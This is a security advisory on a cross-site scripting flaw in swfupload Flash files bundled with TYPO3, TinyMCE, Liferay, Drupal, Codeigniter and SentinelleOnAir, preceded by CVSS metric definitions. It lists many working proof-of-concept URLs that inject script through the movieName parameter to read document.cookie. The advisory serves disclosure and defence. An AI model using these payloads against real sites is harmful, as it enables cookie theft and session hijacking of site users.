The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
I will draw your attention to XSS vulnerability in other web applications
with swfupload. This is finial advisory concerning different versions of
this flash application. Earlier I've wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.
In previous letters I've wrote concerning web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). And now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir - among multiple web applications which
are bundled with swfupload_f10.swf or swfupload_f11.swf.
-------------------------
Affected products:
-------------------------
Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that
they have fixed this vulnerability in their software (at that this
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).
The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.
----------
Details:
----------
XSS (WASC-08):
SwfUploadPanel for TYPO3 CMS:
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Archiv plugin for TinyMCE:
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described
earlier swfupload_f9.swf and swfupload_f8.swf.
Liferay Portal:
http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Liferay Portal also contains swfupload_f10.swf, besides described earlier
swfupload_f9.swf and swfupload_f8.swf.
Swfupload for Drupal:
As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.
http://site/js/libs/swfupload_f10.swf
SWFUpload for Codeigniter:
http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then
in Google's index there is only one project - SentinelleOnAir, which
contains swfupload_f11.swf.
SentinelleOnAir:
http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum